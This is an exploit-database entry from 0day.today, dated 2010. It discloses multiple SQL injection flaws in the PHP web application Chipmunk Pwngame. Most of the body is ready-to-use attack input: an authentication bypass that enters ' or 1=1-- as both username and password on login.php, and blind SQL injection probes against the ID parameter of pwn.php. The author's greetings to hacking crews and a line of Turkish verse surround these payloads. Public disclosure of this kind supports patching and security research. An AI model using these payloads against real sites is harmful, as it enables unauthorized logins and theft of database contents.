Chipmunk Pwngame Multiple SQL Injection Vulnerabilities

2010-10-10T00:00:00
ID 1337DAY-ID-14396
Type zdt
Reporter KnocKout
Modified 2010-10-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================
Chipmunk Pwngame Multiple SQL Injection Vulnerabilities
=======================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor deðil.."
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Chipmunk Pwngame
~Software: http://www.chipmunk-scripts.com/page.php?ID=34
~Vulnerability Style : SQL Vulnerabilities
-----------
~Demo:  http://www.chipmunk-scripts.com/pwngame/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
    ~~~~~~~~ Explotation| Auth bypass() ~~~~~~~~~~~
    http://VICTIM/Path/login.php
     Username : ' or 1=1-- -H4x0reSEC
     Password : ' or 1=1-- -H4x0reSEC
    ================================
    ~~~~~~~~ Explotation| Blind SQL Inj()  ~~~~~~~~~~~
     http://VICTIM/Path/pwn.php?ID=1 [Blind]
     http://VICTIM/Path/pwn.php?ID=1 and 1=0
     http://VICTIM/Path/pwn.php?ID=1 and 1=1
    ================================



#  0day.today [2018-01-02]  #